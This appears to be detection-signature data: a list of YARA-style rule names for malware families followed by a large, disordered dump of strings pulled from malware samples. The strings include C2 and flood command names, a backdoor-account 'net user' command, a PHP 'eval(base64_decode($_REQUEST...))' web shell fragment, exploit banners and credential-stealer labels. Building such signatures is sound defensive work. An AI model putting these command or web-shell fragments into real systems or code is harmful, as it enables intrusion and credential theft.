FlorianRoth/OPCLEAVER_ZhoupinExploitCrew | FlorianRoth/OPCLEAVER_antivirusdetector | FlorianRoth/OPCLEAVER_csext | FlorianRoth/OPCLEAVER_kagent | FlorianRoth/OPCLEAVER_mimikatzWrapper | FlorianRoth/OPCLEAVER_pvz_in | FlorianRoth/OPCLEAVER_pvz_out | FlorianRoth/OPCLEAVER_wndTest | FlorianRoth/OPCLEAVER_zhLookUp | FlorianRoth/OPCLEAVER_zhmimikatz | FlorianRoth/RAT_AAR | FlorianRoth/RAT_Adzok | FlorianRoth/RAT_Ap0calypse | FlorianRoth/RAT_Arcom | FlorianRoth/RAT_BlackNix | FlorianRoth/RAT_BlackShades | FlorianRoth/RAT_BlueBanana | FlorianRoth/RAT_Bozok | FlorianRoth/RAT_ClientMesh | FlorianRoth/RAT_CyberGate | FlorianRoth/RAT_DarkComet | FlorianRoth/RAT_DarkRAT | FlorianRoth/RAT_Greame | FlorianRoth/RAT_HawkEye | FlorianRoth/RAT_Imminent | FlorianRoth/RAT_Infinity | FlorianRoth/RAT_JavaDropper | FlorianRoth/RAT_LostDoor | FlorianRoth/RAT_LuminosityLink | FlorianRoth/RAT_LuxNet | FlorianRoth/RAT_NanoCore | FlorianRoth/RAT_Pandora | FlorianRoth/RAT_Paradox | FlorianRoth/RAT_Plasma | FlorianRoth/RAT_PoisonIvy | FlorianRoth/RAT_PredatorPain | FlorianRoth/RAT_Punisher | FlorianRoth/RAT_PythoRAT | FlorianRoth/RAT_QRat | FlorianRoth/RAT_ShadowTech | FlorianRoth/RAT_SmallNet | FlorianRoth/RAT_SpyGate | FlorianRoth/RAT_Sub7Nation | FlorianRoth/RAT_Vertex | FlorianRoth/RAT_unrecom | FlorianRoth/RAT_xRAT | FlorianRoth/ZxShell_Jul17 | FlorianRoth/Casper_Included_Strings | FlorianRoth/Casper_SystemInformation_Output | FlorianRoth/Recon_Commands_Windows_Gen1 | FlorianRoth/FVEY_ShadowBrokers_Jan17_Screen_Strings | FlorianRoth/Furtim_nativeDLL | FlorianRoth/EquationGroup_elgingamble | FlorianRoth/EquationGroup_sambal | FlorianRoth/EquationGroup__jparsescan_parsescan_5 | FlorianRoth/EquationGroup_noclient_3_3_2 | FlorianRoth/EquationGroup_Toolset_Apr17_Gen2 | FlorianRoth/EquationGroup_Toolset_Apr17_ntevt | FlorianRoth/EquationGroup_Toolset_Apr17_msgkd_msslu64_msgki_mssld | FlorianRoth/skeleton_key_patcher | FlorianRoth/skeleton_key_injected_code | FlorianRoth/Unit78020_Malware_Gen1 | FlorianRoth/apt_ProjectSauron_encryption | FlorianRoth/APT_Liudoor | FlorianRoth/Certutil_Decode_OR_Download | FlorianRoth/IronPanda_Malware_Htran | FlorianRoth/Locky_Ransomware | FlorianRoth/DeepPanda_htran_exe | FlorianRoth/apt_equation_equationlaser_runtimeclasses | FlorianRoth/apt_equation_cryptotable | FlorianRoth/CrowdStrike_Shamoon_DroppedFile | FlorianRoth/ChinaChopper_Generic | FlorianRoth/Payload_Exe2Hex | FlorianRoth/WaterBug_wipbot_2013_dll | FlorianRoth/WaterBug_turla_dropper | FlorianRoth/apt_hellsing_implantstrings | FlorianRoth/IMPLANT_3_v1 | FlorianRoth/IMPLANT_4_v9 | FlorianRoth/IMPLANT_5_v2 | FlorianRoth/IMPLANT_5_v3 | FlorianRoth/IMPLANT_5_v4 | FlorianRoth/Unidentified_Malware_Two | FlorianRoth/BernhardPOS | FlorianRoth/StuxNet_Malware_1 | FlorianRoth/APT_Project_Sauron_Scripts | FlorianRoth/APT_Project_Sauron_arping_module | FlorianRoth/APT_Project_Sauron_kblogi_module | FlorianRoth/APT_Project_Sauron_basex_module | FlorianRoth/APT_Project_Sauron_dext_module | FlorianRoth/UACME_Akagi | FlorianRoth/REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief | FlorianRoth/REDLEAVES_CoreImplant_UniqueStrings | FlorianRoth/PLUGX_RedLeaves | FlorianRoth/Invoke_mimikittenz | FlorianRoth/Codoso_Gh0st_3 | FlorianRoth/Codoso_Gh0st_1 | FlorianRoth/Codoso_PGV_PVID_3 | FlorianRoth/shimrat | FlorianRoth/shimratreporter | FlorianRoth/WoolenGoldfish_Generic_3 | FlorianRoth/apt_nix_elf_Derusbi_Linux_SharedMemCreation | FlorianRoth/apt_nix_elf_Derusbi_Linux_Strings | FlorianRoth/Powerkatz_DLL_Generic | FlorianRoth/apt_RU_MoonlightMaze_customlokitools | FlorianRoth/apt_RU_MoonlightMaze_customsniffer | FlorianRoth/loki2crypto | FlorianRoth/apt_RU_MoonlightMaze_cle_tool | FlorianRoth/apt_RU_MoonlightMaze_xk_keylogger | FlorianRoth/apt_RU_MoonlightMaze_IRIX_exploit_GEN | FlorianRoth/apt_RU_MoonlightMaze_u_logcleaner | FlorianRoth/apt_RU_MoonlightMaze_wipe | FlorianRoth/Trojan_Win32_PlaSrv | FlorianRoth/Trojan_Win32_Platual | FlorianRoth/Trojan_Win32_Plaplex | FlorianRoth/Trojan_Win32_Dipsind_B | FlorianRoth/Trojan_Win32_PlaKeylog_B | FlorianRoth/Trojan_Win32_Adupib | FlorianRoth/Trojan_Win32_PlaLsaLog | FlorianRoth/Trojan_Win32_Plakelog | FlorianRoth/Trojan_Win32_Plainst | FlorianRoth/Trojan_Win32_Plagicom | FlorianRoth/Trojan_Win32_Plaklog | FlorianRoth/Trojan_Win32_Plapiio | FlorianRoth/Trojan_Win32_Plabit | FlorianRoth/Trojan_Win32_Placisc2 | FlorianRoth/Trojan_Win32_Placisc3 | FlorianRoth/Trojan_Win32_Placisc4 |
Strings
		/lib64/ld-linux-x86-64.so.2
libc.so.6
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
C:\\Users\\7\\Desktop\\dll - bak\\Release\\dll.pdbw
TVT DEMOCONFIG-DESTORY\\\\.\\PIPE\\RUN_AT_SESSION (%d)
writedroofiledroocmddrooHideUpdatePzfileHideSysUpfileHideSysCmdDesnation %s is small than finished!
T1Y943jIhk09lkjdsMYGAMEHAVETHISISASUPERNEWGAMENOWBEGINTHIS324NEWGAMEISAPI_CONNECTBD_SOCKBD_DNSPCC_SOCKPCC_PROXYPCC_WEBPROXY?hl=en&q=%s&meta=?hl=en&meta=MirageFox_Server.pdbAVCtest_gagaApp
@net stop seclogonM
}]--X[XA
Word.exeCookie: /search?hl=en=q=%s\\Winsend.d2
TOYOTpipe
+47UGJ(kC#2L#
!%SJa%G1\\\\.\\Pipe\\x141_stdin\\\\.\\Pipe\\x141_stdout\
q0nc9w8edaoiuk2mzrfy3xt1p5ls67g4bvhjdevice_t=MiniAsp
 !"#$%&'()*+,-./0123456789:;3
CreateToolhelp32Snapshot Fail = %d
VST%d.%d.%d.%sW7%d.%d.%d.%scmdshell closedmput over&bingleCreate wpipe failErrCom0\\/*<>|Timeout & QUIT!!!ewr:m:s:h:p:t:b:d:n:w:x:g:k:
abcdefghijkTorNewForUSomething illeagalRundll32 %s,RundllUninstallE
Reqfile not exist!upfile over!
HeartBeat Fail ReConnect.. OK!
*&^%$)*^Asd8623jDs 
%s can't be openednquery cookie failed...query content-length failed...query content-type failed...Current Process id is %dK8DFaGYUs83KF05TGDlet64Esystem32\\drivers\\A-PI.sys===> <Screen%d>N
_BT_VER:1.3.0GetCommandLineGetModuleFileNameAProcess32FirstOpenProcessTerminateProcessCloseHandleProcess32NextSleepSetFileAttributesACopyFileACreateProcessAGetEnvironmentVariableACreateDirectoryARegOpenKeyARegSetValueExARegCloseKeyMessageBoxAGetTempPathAGetTickCounth
`.rdata
@.data
AATnkDHDlO+cOi/6zqUVoaA2DfbTyIoP8y1+Q5MxLfimzeQFgJvk/mdHDjghFl5p2naTmm9y6IAQ2JZpTFhW1WVqC6a8sipU62zO94YwwqtThm+0citlfP4NyEm79c9Qok0S4wG9+87/9FPLbZG9h0DNBTjWDqyoyQP6Hy7r0ty/nwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQABpCpH/X6TONDPvyHNS76gFHJl8NMVfiVKtV829QDAbZE9/OCmpPvvQCLGjD6NhMIKmq48INzQHiFO0Sv83OLA18pc18oIfDBtkyBnZRoaIrw3+tnsLwpEtYRtJ3axE4lT8ZBZ6Zu0EPXjqPkqbxH1RqF4pjBx1Rj15Ky/h1J+CwH0FtmugRGp/CISiQDvB3kDRFjp42s0xOyce8jhmSNH5+E2PM3cXqCknRdIf6ZDRO2alMddsTJhPV0S7hl+LNbB8tzetjZ6zRsZL46NGcj2p6bfQ1jMrgwPWI1Run8uin/YjnTyHpecKai3AWGFHo8SR5dJkFpHb07R1wmlMZqOXyVqc0fapRiHe7mXorsBTD2B9pczszVNkm+SUgKy9MOK+ezUeUH0h290XSNR3eyl3j453C2ygeSCAYhrUyESQoGQgF57KDs04pS/uR+3Yd1wr1dUKPfP7xkKZTtlrdqxSZQ+XtLY5PhjySDqT233WsVTl26L10t9rPYp7nE97Godz8DXn8HfCsqRvYwdwfrOD3cpAnBL2u6gU/G5Cvw47QyiCF96iMMPuWVq25/xLj9Zc+aWMtS9+jVKxnlnvdaxIQ==AAStvhUWRdUCbz2jXG52xG6OXgtHxG9Qd/ckNJ2tQHZAfxDI/H3lmxy2JXILgri/hpf0taVjAbfsohMc+aBndaYkQa73k/WPXvi8lFFCbKBBGVfj7xo4CmiEC5blZCHDNtE6poNeUFKddcXXQAeGOwcvQmVHSxQn+uHIS+VqetyEaQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQABGQUFBWkFZAVrBW4FZAV3BWQFawVjBWYFKwVmBWoFaAUzBQUFKgU2BTMFNQUqBXcFYAV2BWoFcAV3BWYFYAV2BSoFaQVkBWsFbgVgBXcFZAVrBSsFdQVtBXUFGwUFBWQFbAVuBWwFYQVqBWIFdwVqBXAFdQUrBWYFagVoBTkFBQUqBWQFawVvBWoFaAVkBWsFKgVsBWsFZgUqBXUFaQVwBWIFbAVrBXYFKgV2BWYFagVpBWkFKwV1BW0FdQUfBQUFdgVsBWYFagUrBXAFYAVwBWoFKwVmBWoFaAUrBQUFKgVgBWsFYgVsBWsFYAUqBWgFagVhBXAFaQVgBXYFKgV2BXcFZgUrBXUFbQV1BSEFBQVkBWkFcgVkBXwFdgUrBWMFdwV
info@ibm.com0
copy_file_to_system.exeMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; sv1)!his=9!wn=!flof=!fil=!ps=I am so sad!I am so happy!JDK541Please input file to bind and destination file name!%[^:]:%d,%d,%drun ok!InstallLocationDisplayVersionDisplayNameWininet.dll InternetOpenA InternetConnectA HttpOpenRequestA HttpSendRequestA HttpQueryInfoA InternetReadFile InternetCloseHandle
NtKAtKy
CKxxwN
((((((
)))))))
>>>>>>>
<<<<<<
cmd.exee:\\DebugBmw1.0\\BMW\\release\\Large.pdbc:\\bao\\bmw\\release\\bmw.pdb:\\Bmw(AES)\\BMW\\release\\Large.pdb\\Adobe Gamma Loader.lnk\\HP Printer.lnk%s\\spoolsv.exeREGBIN@
\\sys_log.logpipe\\hE110^^^^^\x00wuacult.txt
Nfcore.dllProcGonfcoreokM
comspec /a /cw
Nfclient.dllRundllInstallARundllUninstallA/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)/5.0 (compatible; MSIE 7.0;Windows NT 5.1)1234567890123456\x00ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\x00you specify service name not in Svchost
ATI.JO840112-CRAS8468-11150923-PCI8273VPRINCPESPR!NCPESHASTATI\\Temp\\~v3.logBrowser Password Recovery ReportBrowserPasswordDecryptorwww.SecurityXploded.comC:\\Users\\BERNARDINO\\AppData\\Roaming\\berna@consultoreslegales.com.mx (1).pstMail Password Recovery ReportMailPasswordDecryptorC:\\Users\\apant\\Documents\\Programdata\\abacus.ostc
{0112-CRAS8468-
0923-PCI8273VHASTATI.eddgx
{hellor
%sw7e89.tmp%sSVCHOST.exe
%s\\plg%d.nlsRegisteredOwnerRegisteredOrganizationInstallDateI 'll sleep until to restart ...
z:\\Work\\Make Troy\\h
XNtDeviceIoControlFilentdll.dllmswsock.dllC:\\pj\\testing\\testing\\Release\\WhatTheFuckingIsGoingOnHiMan!kingIsGoingOnHiMan!X
/tmp/tmpAddressbook.vcf
NETUT2.dll
roteualPVirtll
oadDLdrLk
escapedll.dllAcroRd32.exeCre'ateToo'lhelp
TASKKILL /F /IM acro*update.cmdSHGetFolderPathj
LOCATESYMBOLMMRECSversionocmdccmdprtscFC001trj:strpsetservfreshservw7v1.2.10http://%s:%d/PUT[%s]/FC001/%sPittyTiger{\\
80340ae9e2fa4b33dbeb07K
-installkys-removekys-startup/c delSelect Files!Bind Success!\\111.dat(*.jpg)|*.jpg|(*.*)|*.*||(*.exe)|*.exe|(*.*)|*.*||chksrv.exeSeDebugPrivilegeNtQueryInformationProcessD
/kys_allow_put.asp?type=/kys_allow_get.asp?name=unsuccessfully!waiting......reboot false!killprocess8;"1-;!.-TTTT
95000000990000009d000000c3000000c7000000cb000000d7000000e5000000Install_EXE.exe
Embedding
StartWork
Shell started,wait to terminate it.....PKsignclass/WritePolicy.classJavaTool.classsbt/compiler/PKm4
LOADER ERROR
CryptUnprotectDatac
3H`>}0N
{KMiOp
 q&|jn
w4^t6q
U<Ru7.G^
:[CSb@
\-----------------------------7d414e351603fa-----------------------------6e8fad908fe13c
zzzzzzzzzz
---HIDEhide---port = %dimagename found at:%sj
cit_ffcookie.modulecit_video.module
botnetcmd:012345678901234567890
Pink.classpopers.classthequickbrownfxjmpsvalzydg\x00
c:\\Users\\helloworld\\EorvhJdqgohvsulqwiphpvhwphpfsbTactXCIHlpTHXAudioEntrycannot judge proxy is availabel or not!open reg for proxyinfo fails!inhp://d=
*&~^%@0hh8979&*^*@~^%9?i0hHostName: %s\x0d\x0aIP: %s\x0d\x0aProxy: %s\x0d\x0aUser: %s\x0d\x0aSystemDir: %s\x0d\x0aOS Language Version: %d\x0d\x0aSystem Version: %d.%d %s (Build %d)\x0d\x0a\x0d\x0aHostNrme: %s\x0d\x0aIP: %s\x0d\x0aProxy: %s\x0d\x0aUser: %s\x0d\x0aSystemDir: %s\x0d\x0aOS Latguage Version: %d\x0d\x0aSystem Version: %d.%d %s (Build %d)\x0d\x0a\x0d\x0a84lL7R"zz*+%+48L8RlL7+-{"z
.NET CLR 2.0.50727) HavijITSecTeam.comr3dm0v3goingbacksoongoingbacksoon1goingbacksoon
this is UP007GetAllBaseInfoMessageLoopZXCVFDSA#$%@MNBKJHUY@#$%wert
14AJuh31415926ExitProcess0
|SBieDll.dllSbieApi_LogSbieDll_Hookm
BinBuckset_Accountset_Passwordset_Usernameset_Descriptionset_DisplayNameset_ServiceNamebadvpn-1Copyright (C) 2010 Ambroz Bizjak <ambrop7@gmail.com>BadVPN udpgwShowNewsIDtvtsvc is running#============Upload Ok !==============##=========Upload Execute Ok !=========##========Update Execute Ok !==========#Process Do not exit in 10 second, so i Kill it!
eRsingScanDELETE-TCBTIME-WAIT1LAST-ACLOSING!FIN!SYN-RECEIV%cget %s 's password error!SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{e3df6b419d1f}<Start Application 2 key><Start Application 1 key><Select Media key><Start Mail key><Play/Pause Media key>0
WlxLoggedOutSASmsgina.dll\\Br0WMinUSerS.DLLp
httpfloodsynfloodudpfloodtcpflooddownandexevisitsocksM
dcd2db91dac7da9f90dc9fcfd6d1d89f8e8d88918f918f918e9f92d19f8a99dcd2db91dac7da9f90dc9fdecbcbcdd6dd9f92d79f9d9acc9d99dcd2db91dac7da9fcmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c attrib -h \"%s\"&cmd.exe cmd.exe /c move %s %scmd.exe /c copy %s %scmd.exe /c %s %s RundllInstallA
t[1][not httptunnel][1][httptunnel]downfilecmd /k move \"%s\" \"%s\"ipconfig.exeNetTravlertravlerbackinfoABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-*220d5cc15e7e81002
j\;ql?.
SOFTWARE\\KasperskyLab\\protected\\AVP12\\environmentSOFTWARE\\KasperskyLab\\protected\\AVP9\\settings%SystemRoot%\\System32\\winlogon.execom.apple.PubSabAgent/tmp/screen.jpeg
3& }?iN;=
J7E27B224EA15B787A428DCFE47A7216B3DA9C447AC522DEB"     // Key="system323bcd1fghijklmABCDEFGH-J+LMnopq4stuvwxyzNOPQ7STUVWXYZ0e2ar56R89K/9C886AAD51AC7356"  // key = "hongkongw8rT$3%cnpost^~Qdkwero38oerA^t@#
xt6<m%g7k^D4.7xDtp28i!c3gZ@0*3t@
-----------------------------7db2de21201ba
Cookie: pgv_pvid=%016I64d{E190BC79-02DC-0166-4CF1-BD8F8CB2FF21}index.htm?%016I64dakasha_path: %scycle: %d, sleep time: %dInstallDriver: %d %s(%s)Succeed to drop, please wait for the next payload being loaded.!module mimi!axel url path{
htentjhRTDKjhtenhjhtclkjhkdtnjhtslmj_ghiHIABcdkJYlCnefZajoKLRST9-UV5EFGbm67rP123tusNOwxyz0pDWM48QXqvghiHIABcdkJYlCnefZajoKLRST9-UV5EFGbm67rP123tusNOwxyz0_pDWM48QXqv
.apple
Library/Preferences/com.appleMehrdadU
HTTP/1.0Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6CALLBACK[0]CALLBACK[1]CALLBACK[2]CALLBACK[3]CALLBACK[4]MTBTR-DWEvckpba.dat+RRROR oogin as %sID=%s,OEMCP=%d,ACP=%d002 TERMSRV=%d002 INJECT=%s002 SLEEP=%d002 CBM=%d002 CALLBACK[4]=%s002 CALLBACK[3]=%s002 CALLBACK[2]=%s002 CALLBACK[1]=%s002 CALLBACK[0]=%s002 RAMFree=%dMB002 RAM=%dMB002 CPU=%s002 IpAddress=%s002 Password=%s002 Time=%s002 OEMCP=%d002 OS=%s002 Group=%d002 Image=%d002 Name=%s002 Nick=%s002 Version=%s002 ID=%sStartDocAZwUnmapViewOfSectionNtUnmapViewOfSection<%execute request
samlibSHCreateItemFromParsingName
4930040afec885c975f6itsecteam.comQ29kZWQgYnkgQW1pbiBTaG9rb2hpIChQZWp2YWspdo=filemanagerAAAIEAqKaqwTXENJw7IrZCX5JTYAVGPA4ZV6pVD3xWrzJhDcPqH2C47tKdWmtf8qh24UhSU3Q0BlcMatZxuibpcWTOS9PvT2yq5LZqJP9uUqiAJHCWS4QHaH/UTQ1ugBhaADImDv+pJAmiPcT3fStY1UwxxbWJy1gNfr6zeq+iYRGrRmc
s:%ddo_scnoforkdefpt
e %c/%d!
mcf892108549c:\\Temp\\ljjjklllllllllllllllllll324234444444444444444444444444fwedssssssslllllllllllljiooooooooooooooooooooooooooooohjknnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn78ghuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiuiuijjjjx.pdb<description>D3scription</description><STRONG>THIS PAGE IS BIG FIND</STRONG>OnThread_PipeServer6B4E2F40B138C4921F1584CA0EFC19EA6B4E2F6B4E2F40%
Microsoft.VisualBasic.ApplicationServiceswLoaderwLoader.g.resourcesExecuteAssemblyByNameGetTypeFromHandleGetManifestResourceNamesInitializeArrayGetManifestResourceStreamAdwind.classextra/Constantes.classdesinstalador/MaDe.adwind%s%dpara1=%dpara2=%dpara3=%dCCommandAttribeCCommandCDCCommandCMDCCommandNopC
Stub.pdbCIE7PasswordsnjLoggertaskmgrkillerabccba%
%s-SN%d-%s%
proxy info is %S %S %S %Sdomian: %S, port: %S, test domain: %Sproxy num: %d, proxy ip: %S, proxy port: %S, proxy user: %S, proxy pass: %Sencode domain: %s
Global\\m324233333p0Global\\mqe45tex13fw14op0Global\\654223411804dWINSUPDATE.TMPwinsups.dllrundll32.exe \"%s\",UpdatePlatformrundll32.exe \"%s\",DisplayIPInjectPkt%
@TCPfFBPIAVWriteMemInjectorAVRemoteThreadAVCommandControllerfoxcon@foxcon.comInstallerFromDll.dllBZh91AY&s
SendThisFile.
InfoHarvesterCmd.dllhavex1312312f
lppe == NULLRunExeCmd.dllM
AATXn+MiwLu+xCoMG7SqY1uQxAk1qLdyoED9LxIVQr2Z/gsrHIsgTvK9AusdFo+9do_pivot(): connections[ix].header.id=%d ix=%dPacket to be bounced too do_pivot: [2] requested %d bytes but got %ddo_pivot(): inconnsistent seq numbers connections[]..seq=%d header.seq=%ddo_pivot(): connections[header.id].header.id=%d header.id=%d!BUG, please report!usage:%s   IP  port [proxip] [port] [key]dw.datsqlpass.dicsql.datfetch.pymethod=POSTCmdPathencoded_pathdata_%d_%d_%d_%d_%d.txt\"-BFr423mI_6uaMtg$bxl\\sd1iU/0ok.cpegBb63-t2p_.rkd0uaeU/x1c$s\\o4ilx\"a-201Mt6b3sI$ /ceBok_i\\m.rdpU4Fulgomv3.a 1%tNd\\4ils60n2Te_w4mei gd2%rob-8pCt1wq_hynlsc0.u9az:\\Projects\\Rescator\\uploader\\Debug\\scheck.pdbS region: found [] bytes of pattern:[CC2 region:CC memregion:KAPTOXA=== pid:scan process with pid for kartoxa and string pattern:scan process with pid for kartoxa:scan all processes for string pattern:GOTIT6I2cn3Sep1 Uio$ra0su\\wO4B:_kDltW/.NSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089get_rscget_kyget_rnponeyhorsechocolatemomoquackD
RapidStartTech.stlIntelRS.exeStealer.Properties.Resources.resources\\Stealer\\obj\\x86\\Release\\Stealer.pdbIntelRapidStart.exeIntelRapidStart.exe.configMSCF
!aaa.gifrundll32 \"%s\" IasAuthIeUishowmsdmoe.dllSavService.exeabcdefhiklmnorstuvwxz1234567890q
ctfmon.exed:\\0.Work\\0.Coding\\0.Workspace\\downLoader\\Release[Proto]  [Local Address]  [L Port]  [Remote Address]  [R Port]  [State]Last-Error Code\x000H
Cookies[\"zWiz\"]IndexOf(\"es-DN\")[\"Keep-Alive\"] == \"320\"PK
META-INFstub.adwindAdwindServer.classUnrecomServer.classInformacion.adwindInstalador.adwindOpcion1.adwindZ
cd46a1a84ba06cea35d5e0219062162f227fdb26%s(error=%d)CAPAPI32OpenService failCreateService failhttp://wpa.qq.com/msgrd?V=1&Uin=312016&Site=WWW.CNASM.COM&Menu=yesexplorer.exehttp://www.cnasm.com/gui/help.htmlhttp://www.cnasm.com/gui/error.htmlC
<B>Login Information Captured</B><BR>User: %s<B>Clipboard Data Captured</B><BR>User: %sRemoteExecWin32_ProcessConnectServerroot\\cimv2ImpersonationLevelvarStoreNumberIntMicrosoft .NET Framework 2.0a: Return type:i
com/androi/config.xml3hb[
k`a`ddi`hllb
klj`nh
Vg71* 
fa5`fd
.jngibd%s\\sa\\saopts.datSpyAgent_HWND32%s\\sacache\\nowin.logSOFTWARE\\Spytech\\SpyAgent ProKeystrokes Typed
 %s (%s)
 %sSpyAgent password has been successfully changed.error: you need to set your SpyAgent password before proceeding.click the \"Set Password\" button in the \"Options\" dialog to set your password!SpyAgent Keystrokes Log Viewerc:\\Source\\SpyAgent7\\Release\\autoi.pdb.
wrong protocol type/post/download/post/echoJ
00-00-00-00-00-00C:\\Users\\ziedpirate.ziedpirate-PC\\Desktop\\sop\\sop\\Release\\(Separate usernames with a comma, or leave blank to monitor all uses.)Input usernames here and separate with a comma. Leave blank to monitor all users.Please Enter Access Password:                             Delivery via Email and FTP3
\x00Sakula\x00
http://%s/%s%u processor:memory (free/total):  %d(Mb)/ %d(Mb)  (use %d:\\BuildSource\\9\\WindowsClient\\WindowsClient.Client.RC\\Binaries\\Win32\\Release DlpHook\\*
LockItTight Agent MonitorLockItTight EngineLockItTight MonitorLastClearingLogLastLogSendTimeStealthUninstallEnableKeyloggingSnapshootsIntervalSendLogPeriodSendLogSMTPSendLogSMTPPortSendLogSizeSendLogLoginPassClearLogsDaysClearLogsMailed OneShell TUHAOISRIGHTo
wmiexec.vbsWMIEXEC ERRORin shell mode, running command background and persistentConnectPort TransmitPortUsage of Pskillwhat user are we bruteforcing[SERVER]connection toUsage of Packet TransmitSof\x00twar\x00e\\Mi\x00cro\x00soft\\Win\x00dows\\Cur\x00rent\x00Vers\x00un\x00Version\\R\x00dows\\Current\x00Software\\Micro\x00/%lu.asp/%lu.txt/index.html?id=%ld\\httpclient.txtAbout hc1host_namehost_portMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)MSUtemp.dbtemp.datFs.OpenTextFile(Server.MapPath(\"online.txt\"),8,True)<%If Session(\"pig\") <> 1 then%>ed132e13d1332bf7e2612a0eb848b30a<title>CR BY
exeHack</title>Copyright &copy; 2006-2009 CR BY
exeHack All Rights Reserved.net user f4cknet localgroup administrators f4ckF4ckF4ckTeam!@#KLn7m5H8rsAa42Vl0T5MrB1L$rndn = Get-Random$wc.Headers.Add(\"Cookie\", \"p=\" + $rndn)
+;Kit.exeself.bat\\asm_driversIIS_TUNNEL_INSTALLERTunnelListen.dllTunnelConnect.dllDcomIISServicerasacd.syskeymmdrvISNCLASDATA_IISDATA_IIS/1/4/ERRORDATA_IIS/1/4/NULLSENDDATATOCONNECTGETDATAFROMCONNECTDATA_IISOK[
[MemLoadLibrary] Code : %I64XGET http://%s:%d/images/%d.asmx?%sPOST http://%s:%d/Service.asmx/%dContent-Type: Appplication/octet-streamg
Y0/j%fO
awL\:6}]27}w
d%J\wM
HG-O0sO
a-Slf=
73r.srn$,,
GetMaingcqcDQBDE@gcqgQYDv_B}E\\DY@\\UuFU^DCC_S[UD***
 outlook.exeProblem %s Report %sIPM.NoteIP..IP..TaskIP..StickyNoteIP..JournalIP..ContactIP..AppointmentIP..Imapsysteminfo /fo tabletasklist /vipconfig /allContent-type: JPEGMicrosoft DH SChannel Cryptographic ProviderNO DATA%d SETIME SUCCESS.M
SHRegSetUSValueWw
pipetemp0oo.oCZCVoCZCVGV&errorlevel=information&wait=yesMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.4344)AppMainServiceMain
_ISTMPGsv ovmtgs lu Xnw ivhfog urov rh aril!%s %s : Hi,my name is %s%szuLmvXlkbNfgvcSPELL-INCANTATION-MAGIC-CHARM-WIZARDRYo
--------------Server Info---------------------------------Soft Info---------------------------------IP Config-------------------------------------------- Ports & Proc -------------------------regrun ok!can't init api\x0d\x0acan't copy file to appdata.%daleady in appdata path.can't get moudule file namecan't find EnvironmentVariableCreateProcess Error ( %d:%s )CreateProcess Success!can't open mmfile %s.%d.%-20s :%-5s %-16s %5d %-s%-4d UDP %-20s :%-5d%-20s :%-5d %-16s %5d %-s%-4d TCP %-20s :%-5d-------------
HTTP://hkmujj.co.cc--------
-------------
HTTP://www.hkmjj.com-------
------
 V1.0---------------------
------
(VC6.0) V1.0------------------
Coded by Ivanlef0u, shadow3 modifiedwindows 2000 sp4 Chinese (before MS07-017)ZwVdmControl -> My Shellcode, modifiable KiServiceTablecall shellcode ... Find GdiTableEntry ... ok!!!
KiServiceTable == %08X
d:\\codespace\\powerock\\exp\\afdpre\\bin\\afdpre.pdbGuiWAng!@#9bd*-a                  add user(admin$/GuiWAng!@#9bd*) to admin[ERR]  get haltable addresss fail[ERR]  get ZwDeviceIoControlFile fail[ERR]  get native function pointers fail
willweiwei
administrator
willweiwei 
t00ls 
[IIS7Up]-->Could not connect to %s[IIS7Up]-->Couldn't create pipe[IIS7Up]-->Error impersonating pipe[IIS7Up]-->Couldn't get token[IIS7Up]-->Got SYSTEM token...[IIS7Up]-->Command: %s[IIS7Up]-->This exploit gives you a Local System shell [IIS7Up]-->Usage: iis7up.exe \"command\" [IIS7Up]-->No command,use WHOAMI [IIS7Up]-->Changing registry values...[IIS7Up]-->Couldn't set registry values[IIS7Up]-->Restoring default registry values...d:\project\
\Source\Churraskito\Release\Churraskito.pdb
/Churraskito/-->This exploit gives you a Local System shell~ MS10_048 X64 EXP        ~
Need a girl to love   QQ 65665651 email master#h4cker.us [ ] Spawning half a shell...Set Fso=server.createobject(\"scr\"&\"ipt\"&\"ing\"&\".\"&\"fil\"&\"esy\"&\"ste\"&\"mob\"&\"jec\"&\"t\")CheckDirIsOKWriteCheckDirIsOKDelBianliA
###Assassin######KamiKaze###chr(rand(97,122))md5(microtime().rand(0,echo \"###uau-repeatwget -U 'Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) eval(base64_decode($_REQUEST['c_id']))2bd96b5c52d2efd441b75a2617979bdd2b7c84233cd47f142573c18a70ff5770a13756bf1e2bd46921c135232774fc5f36d540721c055de288072d4e16b196dd98f66d46fa71a5fa9b9fcd36aababdae396f72e4974f3e4e2fd7ccffbce9cd7cNot Foun derror was encounteredstopcleandositsoknoproblembro
uploadPOSTURLDownloadToFilereporter.php?msg=&uname=&pword=Technically could be run against remote computers, if allowedD
SOFTWARE\\Borland\\Delphi\\RTLSVW
STMounter.pdbInstall finishZwFuncEntryZCSTEntity.pdbh7834hogus78E
SetElise.pdbEliseDLL.dllESEntryESHandle/
0x01, first info.KSSTCreator.pdbskg(3)=&3.2d_u1
